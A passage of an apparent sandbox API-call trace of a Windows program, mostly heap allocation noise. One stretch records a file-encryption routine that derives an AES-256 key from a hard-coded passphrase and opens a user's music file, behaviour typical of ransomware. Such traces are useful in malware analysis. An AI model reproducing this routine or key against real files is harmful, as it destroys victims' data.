dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.388] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.389] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.389] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0110.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0110.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0110.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0110.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0110.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9cb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0110.391] CloseHandle (hObject=0x258) returned 1 [0110.391] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.391] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0110.391] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40a7170, ftCreationTime.dwHighDateTime=0x1d5e703, ftLastAccessTime.dwLowDateTime=0x84cc6ba0, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x84cc6ba0, ftLastWriteTime.dwHighDateTime=0x1d5edc4, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="gXtG5sqySgJuIPIsH.mp3", cAlternateFileName="GXTG5S~1.MP3")) returned 0x41ac440 [0110.392] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0110.392] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.392] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0110.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0110.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0110.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0110.392] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0110.393] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0110.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.393] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0110.393] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.433] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca3a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0110.433] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0110.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.433] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0110.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.434] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0110.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca1a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0110.434] CryptHashData (hHash=0x41ac280, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0110.434] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.434] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0110.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca190, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0110.434] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0110.434] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0110.434] CryptDestroyHash (hHash=0x41ac280) returned 1 [0110.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0110.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0110.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0110.435] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0110.435] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0110.435] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3" (normalized: "c:\\users\\fd1hvy\\music\\gxtg5sqysgjuipish.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0110.436] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.436] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.437] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, 